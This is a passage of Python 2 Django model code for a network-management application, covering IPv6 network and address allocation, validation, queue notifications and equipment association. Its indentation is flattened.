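#     NetworkIPv6().create_v3(networkv6)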
def update_v3(self, networkv6):
"""
Update new networkIPv6.
"""
self.cluster_unit = networkv6.get('cluster_unit')
tiporede_model = get_model('vlan', 'TipoRede')
self.network_type = tiporede_model().get_by_pk(networkv6.get('network_type'))
# has environmentvip
if networkv6.get('environmentvip'):
environmentvip_model = get_model('ambiente', 'EnvironmentVip')
self.ambient_vip = environmentvip_model().get_by_pk(
networkv6.get('environmentvip'))
self.validate_v3()
self.save()
def delete_v3(self):
"""
Method V3 to remove networkIPv6.
Before removing the networkIPv6, removes all of its IPv6 addresses.
@raise IpCantBeRemovedFromVip: Ip is associated with created
Vip Request.
"""
try:
for ip in self.ipv6_set.all():
ip.delete_v3()
super(NetworkIPv6, self).delete()
except IpCantBeRemovedFromVip, e:
# Network id and Vip Request id
raise Exception(
'This network has a Vip Request pointing to it and cannot be '
'deleted. Network: %s, Vip Request: %s' % (self.networkv6, e.cause))
def validate_v3(self):
"""
Validate NetworkIPv6.
"""
# Validate whether the network is allowed in the environment
configs = self.vlan.ambiente.configs.all()
self.vlan.allow_networks_environment(configs, [], [self])
def validate_network(self):
envs = self.vlan.get_environment_related()
net_ip = [IPNetwork(self.networkv6)]
nets_envs = list()
for env in envs:
# get IPv6 configs of the environment
nts = [IPNetwork(config.ip_config.subnet)
for config in env.configs.filter(
ip_config__type=IP_VERSION.IPv6[0])]
# get networks that can be intersect with current network
if self.vlan.verify_intersect(nts, net_ip)[0]:
self.log.info('Environment %s has config (%s) permitting insertion '
'of this network %s' % (env.name, nts, net_ip))
for vlan in env.vlans:
for network_ipv6 in vlan.networks_ipv6:
nets_envs.append(IPNetwork(network_ipv6.networkv6))
if nets_envs:
subnet, supernet = self.vlan.verify_intersect(nets_envs, net_ip)
if subnet or supernet:
raise Exception(
'One of the equipments associated with the environment '
'of this Vlan is also associated with another environment '
'that has a network in the same range; add filters to the '
'environments if necessary. Your network: %s, network '
'already created: %s' % (subnet, supernet))
subnet, supernet = self.vlan.verify_intersect(net_ip, nets_envs)
if subnet or supernet:
raise Exception(
'One of the equipments associated with the environment '
'of this Vlan is also associated with another environment '
'that has a network in the same range; add filters to the '
'environments if necessary. Your network: %s, network '
'already created: %s' % (supernet, subnet))
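# Overlap sketch (illustrative; assumes vlan.verify_intersect() returns a
# (subnets, supernets) pair as used above). A new fd00::/64 inside an
# already created fd00::/48 on a related environment must fail:
#
#     nets_envs = [IPNetwork('fd00::/48')]
#     net_ip = [IPNetwork('fd00::/64')]
#     subnet, supernet = self.vlan.verify_intersect(nets_envs, net_ip)
#     # truthy result -> validate_network() raises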
def activate_v3(self):
"""
Sends activation info of the v6 network to the queue of the ACL
configuration system.
Update status column to 'active = 1'.
@raise NetworkIPv6Error: Error activating a NetworkIPv6.
"""
try:
self.active = 1
self.save()
net_slz = get_app('api_network', 'serializers.v3')
serializer = net_slz.NetworkIPv6V3Serializer(
self,
include=('vlan__details__environment__basic',))
data_to_queue = serializer.data
data_to_queue.update({
'description': queue_keys.NETWORKv6_ACTIVATE
})
# Send to Queue
queue_manager = QueueManager()
queue_manager.append({
'action': queue_keys.NETWORKv6_ACTIVATE,
'kind': queue_keys.NETWORKv6_KEY,
'data': data_to_queue
})
queue_manager.send()
except Exception, e:
self.log.error(u'Error activating NetworkIPv6.')
raise NetworkIPv6Error(e, u'Error activating NetworkIPv6.')
def deactivate_v3(self):
"""
Sends deactivation info of the v6 network to the queue of the ACL
configuration system.
Update status column to 'active = 0'.
@raise NetworkIPv6Error: Error disabling a NetworkIPv6.
"""
try:
net_slz = get_app('api_network', 'serializers.v3')
self.active = 0
serializer = net_slz.NetworkIPv6V3Serializer(
self,
include=('vlan__details__environment__basic',))
data_to_queue = serializer.data
data_to_queue.update({
'description': queue_keys.NETWORKv6_DEACTIVATE
})
# Send to Queue
queue_manager = QueueManager()
queue_manager.append({
'action': queue_keys.NETWORKv6_DEACTIVATE,
'kind': queue_keys.NETWORKv6_KEY,
'data': data_to_queue
})
queue_manager.send()
self.save()
except Exception, e:
self.log.error(u'Error disabling NetworkIPv6.')
raise NetworkIPv6Error(e, u'Error disabling NetworkIPv6.')
def allocate_network(self, id_vlan, prefix=None):
"""Allocate new NetworkIPv6
@raise VlanNotFoundError: Vlan is not registered.
@raise VlanError: Failed to search for the Vlan
@raise ConfigEnvironmentInvalidError: Invalid Environment Configuration or not registered
@raise NetworkIPv6Error: Error persisting a NetworkIPv6.
@raise NetworkIPv6AddressNotAvailableError: Unavailable address to create a NetworkIPv6.
@raise InvalidValueError: Network type does not exist.
"""
vlan_model = get_model('vlan', 'Vlan')
self.vlan = vlan_model().get_by_pk(id_vlan)
netv4, nets_envs = self.vlan.get_networks_related(
has_netv4=False, exclude_current=False)
nets_envs = [IPNetwork(net.networkv6) for net in nets_envs]
try:
configs = self.vlan.ambiente.configs.filter(
ip_config__type=IP_VERSION.IPv6[0])
# For each configuration found in the environment
for config in configs:
net6 = IPNetwork(config.ip_config.subnet)
if prefix is not None:
new_prefix = int(prefix)
else:
new_prefix = int(config.ip_config.new_prefix)
self.log.info(
u'Prefix that will be used: %s' % new_prefix)
subnets = net6.iter_subnets(new_prefix=new_prefix)
for subnet in subnets:
try:
self.vlan.verify_networks(nets_envs, [subnet])
except Exception, e:
# Subnet overlaps an existing network; try the next candidate
continue
else:
# Set octs by network generated
self.block1, self.block2, self.block3, self.block4,\
self.block5, self.block6, self.block7, self.block8 = str(
subnet.network.exploded
).split(':')
# Set block by network generated
self.block = subnet.prefixlen
mask = subnet.netmask.exploded.split(':')
self.mask1 = mask[0]
self.mask2 = mask[1]
self.mask3 = mask[2]
self.mask4 = mask[3]
self.mask5 = mask[4]
self.mask6 = mask[5]
self.mask7 = mask[6]
self.mask8 = mask[7]
return
# No available network was found in any environment configuration
raise NetworkIPv6AddressNotAvailableError(
None, u'Unavailable address to create a NetworkIPv6.')
except (ValueError, TypeError, AddressValueError), e:
raise ConfigEnvironmentInvalidError(e, u'Invalid Configuration')
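# Prefix-subdivision sketch (illustrative), using the same ipaddr-style
# calls as above: a /56 environment config carved into /64 candidates.
#
#     net6 = IPNetwork('fdbe:bebe::/56')
#     for subnet in net6.iter_subnets(new_prefix=64):
#         pass  # fdbe:bebe::/64, fdbe:bebe:0:1::/64, ...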
class Ipv6(BaseModel):
id = models.AutoField(
primary_key=True,
db_column='id_ipv6'
)
description = models.CharField(
max_length=100,
blank=True,
db_column='descricao'
)
networkipv6 = models.ForeignKey(
'ip.NetworkIPv6',
db_column='id_redeipv6'
)
block1 = models.CharField(
max_length=4,
db_column='bloco1'
)
block2 = models.CharField(
max_length=4,
db_column='bloco2'
)
block3 = models.CharField(
max_length=4,
db_column='bloco3'
)
block4 = models.CharField(
max_length=4,
db_column='bloco4'
)
block5 = models.CharField(
max_length=4,
db_column='bloco5'
)
block6 = models.CharField(
max_length=4,
db_column='bloco6'
)
block7 = models.CharField(
max_length=4,
db_column='bloco7'
)
block8 = models.CharField(
max_length=4,
db_column='bloco8'
)
log = logging.getLogger('Ipv6')
class Meta(BaseModel.Meta):
db_table = u'ipsv6'
managed = True
unique_together = ('block1', 'block2', 'block3', 'block4',
'block5', 'block6', 'block7', 'block8', 'networkipv6')
def _get_formated_ip(self):
"""Returns formated ip."""
return '%s:%s:%s:%s:%s:%s:%s:%s' % (
self.block1, self.block2, self.block3, self.block4,
self.block5, self.block6, self.block7, self.block8)
ip_formated = property(_get_formated_ip)
def _get_equipments(self):
"""Returns equipments list."""
ipeqs = self.ipv6equipament_set.all().select_related('equipamento')
eqpts = [ipeq.equipamento for ipeq in ipeqs]
return eqpts
equipments = property(_get_equipments)
def _get_vips(self):
"""Returns vips list."""
vips = self.viprequest_set.all()
return vips
vips = property(_get_vips)
def _get_server_pool_members(self):
"""Returns pool members list."""
server_pool_members = self.serverpoolmember_set.all()
return server_pool_members
server_pool_members = property(_get_server_pool_members)
@classmethod
def get_by_pk(cls, id):
"""Get IPv6 by id.
@return: IPv6.
@raise IpNotFoundError: IPv6 is not registered.
@raise IpError: Failed to search for the IPv6.
@raise OperationalError: Lock wait timeout exceeded.
"""
try:
return Ipv6.objects.filter(id=id).uniqueResult()
except ObjectDoesNotExist, e:
raise IpNotFoundError(e, u'There is no IP with pk = %s.' % id)
except OperationalError, e:
cls.log.error(u'Lock wait timeout exceeded.')
raise OperationalError(
e, u'Lock wait timeout exceeded; try restarting transaction')
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP.')
def get_by_blocks_equipment(self, block1, block2, block3, block4, block5, block6, block7, block8, equip_id):
"""Get IPv6 by blocks and equip_id.
@return: IPv6.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
return Ipv6.objects.get(block1=block1, block2=block2, block3=block3, block4=block4, block5=block5,
block6=block6, block7=block7, block8=block8, ipv6equipament__equipamento__id=equip_id)
except ObjectDoesNotExist, e:
raise IpNotFoundError(e, u'There is no IP %s:%s:%s:%s:%s:%s:%s:%s for equipment %s.' % (
block1, block2, block3, block4, block5, block6, block7, block8, equip_id))
except Exception, e:
self.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP.')
@classmethod
def list_by_network(cls, id_network):
"""Get IP6 LIST by id_network.
@return: IP6 List.
@raise IpNotFoundError: IP6 is not registered.
@raise IpError: Failed to search for the IP6.
@raise OperationalError: Lock wait timeout exceeded.
"""
try:
return Ipv6.objects.filter(networkipv6=id_network)
except ObjectDoesNotExist, e:
raise IpNotFoundError(
e, u'There is no IP with network_id = %s.' % id_network)
except OperationalError, e:
cls.log.error(u'Lock wait timeout exceeded.')
raise OperationalError(
e, u'Lock wait timeout exceeded; try restarting transaction')
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP')
@classmethod
def list_by_environment_and_equipment(cls, id_ambiente, id_equipment):
"""Get IP LIST by id_network.
@return: IP List.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
@raise OperationalError: Lock wait timeout exceeded.
"""
try:
return Ipv6.objects.filter(
networkipv6__vlan__ambiente__id=id_ambiente,
ipv6equipament__equipamento__id=id_equipment)
except ObjectDoesNotExist, e:
raise IpNotFoundError(
e, u'There is no IP for environment = %s and equipment = %s.' % (id_ambiente, id_equipment))
except OperationalError, e:
cls.log.error(u'Lock wait timeout exceeded.')
raise OperationalError(
e, u'Lock wait timeout exceeded; try restarting transaction')
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP')
@classmethod
def get_available_ip6(cls, id_network):
"""Get a available ip6 for network6
@return: Available IP6
@raise IpNotAvailableError: NetworkIPv6 does not has available Ip6
"""
cls.networkipv6 = NetworkIPv6.get_by_pk(id_network)
# Cast to API
net6 = IPv6Network('%s:%s:%s:%s:%s:%s:%s:%s/%s' % (
cls.networkipv6.block1, cls.networkipv6.block2, cls.networkipv6.block3,
cls.networkipv6.block4, cls.networkipv6.block5, cls.networkipv6.block6,
cls.networkipv6.block7, cls.networkipv6.block8, cls.networkipv6.block))
# Find all ipv6s related to the network
ips = Ipv6.objects.filter(networkipv6__id=cls.networkipv6.id)
# Cast all to API class
ipsv6 = set([(IPv6Address('%s:%s:%s:%s:%s:%s:%s:%s' % (
ip.block1, ip.block2, ip.block3, ip.block4, ip.block5, ip.block6, ip.block7, ip.block8))) for ip in ips])
# Get configuration
conf = Configuration.get()
selected_ip = None
# For each ip generated
i = 0
for ip in net6.iterhosts():
# Do not use some range of IPs (config)
i = i + 1
if i >= conf.IPv6_MIN and i < (net6.numhosts - conf.IPv6_MAX):
# If IP generated was not used
if ip not in ipsv6:
# Use it
selected_ip = ip
return selected_ip.exploded
if selected_ip is None:
raise IpNotAvailableError(
None, u'No IP6 available to NETWORK %s.' % cls.networkipv6.id)
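# Allocation-window sketch (illustrative; the config values are
# hypothetical). With conf.IPv6_MIN = 5 and conf.IPv6_MAX = 5, the loop
# above behaves like:
#
#     for i, ip in enumerate(net6.iterhosts(), start=1):
#         if 5 <= i < net6.numhosts - 5 and ip not in ipsv6:
#             return ip.exploded  # first free address inside the window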
@classmethod
def get_first_available_ip6(cls, id_network, topdown=False):
"""Get a first available ip6 for network6
@return: Available IP6
@raise IpNotAvailableError: NetworkIPv6 does not has available Ip6
"""
cls.networkipv6 = NetworkIPv6.get_by_pk(id_network)
# Cast to API
net6 = IPv6Network('%s:%s:%s:%s:%s:%s:%s:%s/%s' % (
cls.networkipv6.block1, cls.networkipv6.block2, cls.networkipv6.block3,
cls.networkipv6.block4, cls.networkipv6.block5, cls.networkipv6.block6,
cls.networkipv6.block7, cls.networkipv6.block8, cls.networkipv6.block))
# Find all ipv6s related to the network
ips = Ipv6.objects.filter(networkipv6__id=cls.networkipv6.id)
for ip in ips:
cls.log.info('ip %s' % ip.block8)
# Cast all to API class
ipsv6 = set([(IPv6Address('%s:%s:%s:%s:%s:%s:%s:%s' % (
ip.block1, ip.block2, ip.block3, ip.block4, ip.block5, ip.block6, ip.block7, ip.block8)
)) for ip in ips])
selected_ip = None
if topdown:
method = net6.iterhostsTopDown
else:
method = net6.iterhosts
# For each ip generated
for ip in method():
# If IP generated was not used
if ip not in ipsv6:
# Use it
selected_ip = ip
return selected_ip.exploded
if selected_ip is None:
raise IpNotAvailableError(
None, u'No IP6 available to NETWORK %s.' % cls.networkipv6.id)
def delete_ip6(self, user, id_ip):
try:
ip = self.get_by_pk(id_ip)
ip.delete()
except IpNotFoundError, e:
raise IpNotFoundError(None, e)
except Exception, e:
self.log.error(u'Failure to delete the IP.')
raise IpError(e, u'Failure to delete the IP')
def edit_ipv6(self, user):
try:
# Cast to API
net6 = IPv6Network('%s:%s:%s:%s:%s:%s:%s:%s/%s' % (self.networkipv6.block1, self.networkipv6.block2, self.networkipv6.block3, self.networkipv6.block4,
self.networkipv6.block5, self.networkipv6.block6, self.networkipv6.block7, self.networkipv6.block8, self.networkipv6.block))
# Find all ipv6s related to the network
ips = Ipv6.objects.filter(networkipv6__id=self.networkipv6.id)
ip6_object = IPv6Address('%s:%s:%s:%s:%s:%s:%s:%s' % (
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8))
# Cast all to API class
ipsv6 = set([IPv6Address('%s:%s:%s:%s:%s:%s:%s:%s' % (
ip.block1, ip.block2, ip.block3, ip.block4, ip.block5, ip.block6, ip.block7, ip.block8)) for ip in ips])
# Get configuration
conf = Configuration.get()
flag = True
aux_ip6 = ip6_object.exploded
aux_ip6 = aux_ip6.split(':')
self.block1 = aux_ip6[0]
self.block2 = aux_ip6[1]
self.block3 = aux_ip6[2]
self.block4 = aux_ip6[3]
self.block5 = aux_ip6[4]
self.block6 = aux_ip6[5]
self.block7 = aux_ip6[6]
self.block8 = aux_ip6[7]
if ip6_object not in ipsv6:
flag = False
if ip6_object in net6:
# Get configuration
conf = Configuration.get()
first_ip_network = int(net6.network)
bcast_ip_network = int(net6.broadcast)
ipv6_network = int(ip6_object)
if ipv6_network >= (first_ip_network + conf.IPv6_MIN) and ipv6_network < (bcast_ip_network - conf.IPv6_MAX):
flag = True
else:
ip6_aux = self.get_by_blocks_and_net(
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8, self.networkipv6.id)
if self.id != ip6_aux.id:
raise IpNotAvailableError(None, u'Ipv6 %s:%s:%s:%s:%s:%s:%s:%s already in use by network %s.' % (
self.block1, self.block2, self.block3, self.block4, self.block5,
self.block6, self.block7, self.block8, self.networkipv6.id))
if flag:
self.save()
else:
raise IpNotAvailableError(None, u'Ipv6 %s:%s:%s:%s:%s:%s:%s:%s not available for network %s.' % (
self.block1, self.block2, self.block3, self.block4, self.block5,
self.block6, self.block7, self.block8, self.networkipv6.id))
except IpEquipmentAlreadyAssociation, e:
self.log.error(e)
raise IpEquipmentAlreadyAssociation(None, e)
except AddressValueError:
raise InvalidValueError(None, 'ip6', u'%s:%s:%s:%s:%s:%s:%s:%s' % (
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8))
except IpNotAvailableError, e:
raise IpNotAvailableError(None, e.message)
except IpError, e:
self.log.error(
u'Error adding new IPv6 or relationship ip-equipment.')
raise IpError(
e, u'Error adding new IPv6 or relationship ip-equipment.')
def save_ipv6(self, equipment_id, user, net):
try:
already_ip = False
# Cast to API
net6 = IPv6Network('%s:%s:%s:%s:%s:%s:%s:%s/%s' % (net.block1, net.block2, net.block3, net.block4,
net.block5, net.block6, net.block7, net.block8, net.block))
# Find all ipv6s related to the network
ips = Ipv6.objects.filter(networkipv6__id=net.id)
ip6_object = IPv6Address('%s:%s:%s:%s:%s:%s:%s:%s' % (
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8))
# Cast all to API class
ipsv6 = set([IPv6Address('%s:%s:%s:%s:%s:%s:%s:%s' % (
ip.block1, ip.block2, ip.block3, ip.block4, ip.block5, ip.block6, ip.block7, ip.block8)) for ip in ips])
# Get configuration
# conf = Configuration.get()
flag = False
aux_ip6 = ip6_object.exploded
aux_ip6 = aux_ip6.split(':')
self.block1 = aux_ip6[0]
self.block2 = aux_ip6[1]
self.block3 = aux_ip6[2]
self.block4 = aux_ip6[3]
self.block5 = aux_ip6[4]
self.block6 = aux_ip6[5]
self.block7 = aux_ip6[6]
self.block8 = aux_ip6[7]
# ip6_object = ip6_object.exploded
if ip6_object not in ipsv6:
if ip6_object in net6:
# Get configuration
# conf = Configuration.get()
first_ip_network = int(net6.network)
bcast_ip_network = int(net6.broadcast)
ipv6_network = int(ip6_object)
if ipv6_network >= (first_ip_network) and ipv6_network < (bcast_ip_network):
flag = True
else:
ip_aux = self.get_by_blocks_and_net(
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8, net.id)
try:
Ipv6Equipament.get_by_ip6(ip_aux.id)
raise IpEquipmentAlreadyAssociation(None, u'Ipv6 %s:%s:%s:%s:%s:%s:%s:%s already has an association with an Equipment. Try using the association screen for this Ip.' % (
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8))
except IpEquipmentNotFoundError, e:
flag = True
already_ip = True
if flag:
equipment = Equipamento().get_by_pk(equipment_id)
ip6_equipment = Ipv6Equipament()
if not already_ip:
self.networkipv6_id = net.id
self.save()
ip6_equipment.ip = self
else:
ip6_equipment.ip = ip_aux
if self.description is not None and len(self.description) > 0:
ip_aux.description = self.description
ip_aux.save()
ip6_equipment.equipamento = equipment
# ## Filter case 2 - Adding a new IpEquip for an equipment that already has an ip in another network with the same range ##
# Get all IpEquipamento related to this equipment
ip_equips = Ipv6Equipament.objects.filter(
equipamento=equipment_id)
for ip_test in [ip_equip.ip for ip_equip in ip_equips]:
if ip_test.networkipv6.block1 == self.networkipv6.block1 and \
ip_test.networkipv6.block2 == self.networkipv6.block2 and \
ip_test.networkipv6.block3 == self.networkipv6.block3 and \
ip_test.networkipv6.block4 == self.networkipv6.block4 and \
ip_test.networkipv6.block5 == self.networkipv6.block5 and \
ip_test.networkipv6.block6 == self.networkipv6.block6 and \
ip_test.networkipv6.block7 == self.networkipv6.block7 and \
ip_test.networkipv6.block8 == self.networkipv6.block8 and \
ip_test.networkipv6.block == self.networkipv6.block and \
ip_test.networkipv6 != self.networkipv6:
# Filter testing
if ip_test.networkipv6.vlan.ambiente.filter is None or self.networkipv6.vlan.ambiente.filter is None:
raise IpRangeAlreadyAssociation(
None, u'Equipment is already associated with another ip with the same ip range.')
else:
# Test both environment's filters
tp_equip_list_one = list()
for fet in FilterEquipType.objects.filter(filter=self.networkipv6.vlan.ambiente.filter.id):
tp_equip_list_one.append(fet.equiptype)
tp_equip_list_two = list()
for fet in FilterEquipType.objects.filter(filter=ip_test.networkipv6.vlan.ambiente.filter.id):
tp_equip_list_two.append(fet.equiptype)
if equipment.tipo_equipamento not in tp_equip_list_one or equipment.tipo_equipamento not in tp_equip_list_two:
raise IpRangeAlreadyAssociation(
None, u'Equipment is already associated with another ip with the same ip range.')
# # Filter case 2 - end ##
ip6_equipment.save()
# Makes Environment Equipment association
try:
equipment_environment = EquipamentoAmbiente()
equipment_environment.equipamento = equipment
equipment_environment.ambiente = net.vlan.ambiente
equipment_environment.create(user)
except EquipamentoAmbienteDuplicatedError, e:
# If it already exists, OK!
pass
else:
raise IpNotAvailableError(None, u'Ipv6 %s:%s:%s:%s:%s:%s:%s:%s not available for network %s.' % (
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8, net.id))
except IpRangeAlreadyAssociation, e:
raise IpRangeAlreadyAssociation(None, e.message)
except IpEquipmentAlreadyAssociation, e:
raise IpEquipmentAlreadyAssociation(None, e.message)
except AddressValueError:
raise InvalidValueError(None, 'ip6', u'%s:%s:%s:%s:%s:%s:%s:%s' % (
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8))
except IpNotAvailableError, e:
raise IpNotAvailableError(None, u'Ipv6 %s:%s:%s:%s:%s:%s:%s:%s not available for network %s.' % (
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8, net.id))
except IpError, e:
self.log.error(
u'Error adding new IPv6 or relationship ip-equipment.')
raise IpError(
e, u'Error adding new IPv6 or relationship ip-equipment.')
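# "Filter case 2" sketch (illustrative; the addresses are hypothetical).
# The block above stops an equipment from holding a second IPv6 in a
# different network that spans the same range, unless both environments
# carry a filter that covers this equipment's type:
#
#     # eqpt 42 already owns fdbe::10 in a fdbe::/64 of environment A;
#     # saving fdbe::20 into another fdbe::/64 (environment B) raises
#     # IpRangeAlreadyAssociation when either environment has no filter.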
def create(self, authenticated_user, equipment_id, id):
"""Persist an IPv6 and associate it to an equipment.
If the equipment was not related to the VLAN environment, this creates the relationship.
@return: Nothing
@raise NetworkIPv6NotFoundError: NetworkIPv6 does not exist.
@raise NetworkIPv6Error: Error finding NetworkIPv6.
@raise EquipamentoNotFoundError: Equipment does not exist.
@raise EquipamentoError: Error finding Equipment.
@raise IpNotAvailableError: No IP available to VLAN.
@raise IpError: Error persisting in database.
"""
self.networkipv6 = NetworkIPv6().get_by_pk(id)
# Cast to API
net6 = IPv6Network('%s:%s:%s:%s:%s:%s:%s:%s/%s' % (
self.networkipv6.block1, self.networkipv6.block2, self.networkipv6.block3, self.networkipv6.block4,
self.networkipv6.block5, self.networkipv6.block6, self.networkipv6.block7, self.networkipv6.block8, self.networkipv6.block))
# Find all ipv6s related to the network
ips = Ipv6.objects.filter(networkipv6__id=self.networkipv6.id)
# Cast all to API class
ipsv6 = set([(IPv6Address('%s:%s:%s:%s:%s:%s:%s:%s' % (
ip.block1, ip.block2, ip.block3, ip.block4, ip.block5, ip.block6, ip.block7, ip.block8))) for ip in ips])
# Get configuration
conf = Configuration.get()
selected_ip = None
# For each ip generated
i = 0
for ip in net6.iterhosts():
# Do not use some range of IPs (config)
i = i + 1
if i >= conf.IPv6_MIN and i < (net6.numhosts - conf.IPv6_MAX):
# If IP generated was not used
if ip not in ipsv6:
# Use it
selected_ip = ip
# Stop generation
break
if selected_ip is None:
raise IpNotAvailableError(
None, u'No IPv6 available to VLAN %s.' % self.networkipv6.vlan.num_vlan)
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8 = str(
selected_ip.exploded).split(':')
equipment = Equipamento().get_by_pk(equipment_id)
try:
self.save()
ipv6_equipment = Ipv6Equipament()
ipv6_equipment.ip = self
ipv6_equipment.equipamento = equipment
ipv6_equipment.save(authenticated_user)
try:
equipment_environment = EquipamentoAmbiente().get_by_equipment_environment(
equipment_id, self.networkipv6.vlan.ambiente_id)
except EquipamentoAmbienteNotFoundError:
equipment_environment = EquipamentoAmbiente()
equipment_environment.equipamento = equipment
equipment_environment.ambiente = self.networkipv6.vlan.ambiente
equipment_environment.save(authenticated_user)
except Exception, e:
self.log.error(
u'Error adding new IPv6 or relationship ip-equipment.')
raise IpError(
e, u'Error adding new IPv6 or relationship ip-equipment.')
@classmethod
def get_by_blocks_and_net(cls, block1, block2, block3, block4, block5, block6, block7, block8, id_network):
"""Get Ipv6 by blocks and network.
@return: Ipv6.
@raise IpNotFoundError: Ipv6 is not registered.
@raise IpError: Failed to search for the Ipv6.
"""
try:
return Ipv6.objects.get(
block1=block1, block2=block2, block3=block3, block4=block4, block5=block5,
block6=block6, block7=block7, block8=block8, networkipv6=id_network)
except ObjectDoesNotExist, e:
raise IpNotFoundError(e, u'There is no Ipv6 %s:%s:%s:%s:%s:%s:%s:%s.' % (
block1, block2, block3, block4, block5, block6, block7, block8))
except Exception, e:
cls.log.error(u'Failure to search the Ipv6.')
raise IpError(e, u'Failure to search the Ipv6.')
@classmethod
def get_by_blocks(cls, block1, block2, block3, block4, block5, block6, block7, block8):
"""Get Ipv6's by blocks.
@return: Ipv6's.
@raise IpNotFoundError: Ipv6 is not registered.
@raise IpError: Failed to search for the Ipv6.
"""
try:
ips = Ipv6.objects.filter(block1=block1, block2=block2, block3=block3,
block4=block4, block5=block5, block6=block6, block7=block7, block8=block8)
if len(ips) == 0:
raise ObjectDoesNotExist()
return ips
except ObjectDoesNotExist, e:
raise IpNotFoundError(e, u'There is no Ipv6 %s:%s:%s:%s:%s:%s:%s:%s.' % (
block1, block2, block3, block4, block5, block6, block7, block8))
except Exception, e:
cls.log.error(u'Failure to search the Ipv6.')
raise IpError(e, u'Failure to search the Ipv6.')
@classmethod
def get_by_octs_and_environment_vip(cls, block1, block2, block3, block4, block5,
block6, block7, block8, id_evip, valid=True):
"""Get Ipv6 by blocks and environment vip.
@return: Ipv6.
@raise IpNotFoundError: Ipv6 is not registered.
@raise IpError: Failed to search for the Ipv6.
"""
try:
ips = Ipv6.objects.filter(
block1=block1, block2=block2, block3=block3,
block4=block4, block5=block5, block6=block6, block7=block7, block8=block8)
if ips.count() == 0:
raise IpNotFoundError(None)
if valid is True:
return Ipv6.objects.get(
block1=block1, block2=block2, block3=block3, block4=block4, block5=block5,
block6=block6, block7=block7, block8=block8, networkipv6__ambient_vip__id=id_evip)
else:
for ip in ips:
if ip.networkipv6.ambient_vip:
if ip.networkipv6.ambient_vip.id == id_evip:
return ip
else:
environments = Ambiente.objects.filter(
vlan__networkipv6__ambient_vip__id=id_evip)
for env in environments:
if ip.networkipv6.vlan.ambiente.divisao_dc.id == env.divisao_dc.id \
and ip.networkipv6.vlan.ambiente.ambiente_logico.id == env.ambiente_logico.id:
return ip
raise ObjectDoesNotExist()
except ObjectDoesNotExist, e:
evip = EnvironmentVip.get_by_pk(id_evip)
msg = u'Ipv6 is not related to Vip Environment: %s.' % evip.show_environment_vip()
cls.log.error(msg)
raise IpNotFoundByEquipAndVipError(e, msg)
except IpNotFoundError, e:
msg = u'Ipv6 "%s.%s.%s.%s.%s.%s.%s.%s" não existe.' % (
block1, block2, block3, block4, block5, block6, block7, block8)
cls.log.error(msg)
raise IpNotFoundError(e, msg)
except Exception, e:
cls.log.error(u'Failure to search the Ipv6.')
raise IpError(e, u'Failure to search the Ipv6.')
@classmethod
def get_by_octs_and_environment(cls, block1, block2, block3, block4, block5,
block6, block7, block8, id_environment):
"""Get Ipv6 by blocks and environment.
@return: Ipv6.
@raise IpNotFoundError: Ipv6 is not registered.
@raise IpError: Failed to search for the Ipv6.
"""
try:
return Ipv6.objects.get(
block1=block1, block2=block2, block3=block3, block4=block4, block5=block5,
block6=block6, block7=block7, block8=block8, networkipv6__vlan__ambiente__id=id_environment)
except ObjectDoesNotExist, e:
raise IpNotFoundError(e, u'There is no IPv6 %s:%s:%s:%s:%s:%s:%s:%s in environment %s.' % (
block1, block2, block3, block4, block5, block6, block7, block8, id_environment))
except Exception, e:
cls.log.error(u'Failure to search the Ipv6.')
raise IpError(e, u'Failure to search the Ipv6.')
def delete(self):
"""Sobrescreve o método do Django para remover um IP.
Antes de remover o IP remove todas as suas requisições de VIP e os relacionamentos com equipamentos.
"""
try:
# Delete all associated Vip Requests
for r in self.requisicaovips_set.all():
r_alter = False
id_vip = r.id
if r.vip_criado:
raise IpCantBeRemovedFromVip(
r.id, 'Ipv6 cannot be removed because it is in use by Vip Request %s' % (r.id))
else:
if r.ip is not None:
r.ipv6 = None
r.validado = 0
r.save()
r_alter = True
# SYNC_VIP
syncs.old_to_new(r)
if not r_alter:
r.delete()
# SYNC_VIP
syncs.delete_new(id_vip)
# Delete all associated EquipmentIp and EnvironmentEquip
for ie in self.ipv6equipament_set.all():
# Code removed: we must not remove the environment from the equipment
# even if it has no IP for that environment (requested by Henrique)
# ambienteequip = EquipamentoAmbiente()
# ambienteequip = ambienteequip.get_by_equipment_environment(
# ie.equipamento.id, self.networkipv6.vlan.ambiente_id)
#
# ips = Ip.list_by_environment_and_equipment(
# ambienteequip.ambiente_id, ie.equipamento.id)
# ips6 = Ipv6.list_by_environment_and_equipment(
# ambienteequip.ambiente_id, ie.equipamento.id)
#
# if len(ips) <= 0 and len(ips6) <= 1:
#
# ambienteequip.delete()
ie.delete()
# Serializes obj
ip_slz = get_app('api_ip', module_label='serializers')
serializer = ip_slz.Ipv6V3Serializer(self)
data_to_queue = serializer.data
# Deletes Obj IP
super(Ipv6, self).delete()
# Sends to Queue
queue_manager = QueueManager()
data_to_queue.update({'description': queue_keys.IPv6_REMOVE})
queue_manager.append({
'action': queue_keys.IPv6_REMOVE,
'kind': queue_keys.IPv6_KEY,
'data': data_to_queue
})
queue_manager.send()
except EquipamentoAmbienteNotFoundError, e:
raise EquipamentoAmbienteNotFoundError(None, e.message)
except IpCantBeRemovedFromVip, e:
raise IpCantBeRemovedFromVip(e.cause, e.message)
except IpEquipmentNotFoundError, e:
raise IpEquipmentNotFoundError(None, e.message)
def delete_v3(self):
"""
Method V3 to remove Ipv6.
Before removing the IP, removes all of its VIP requests
and relationships with equipments.
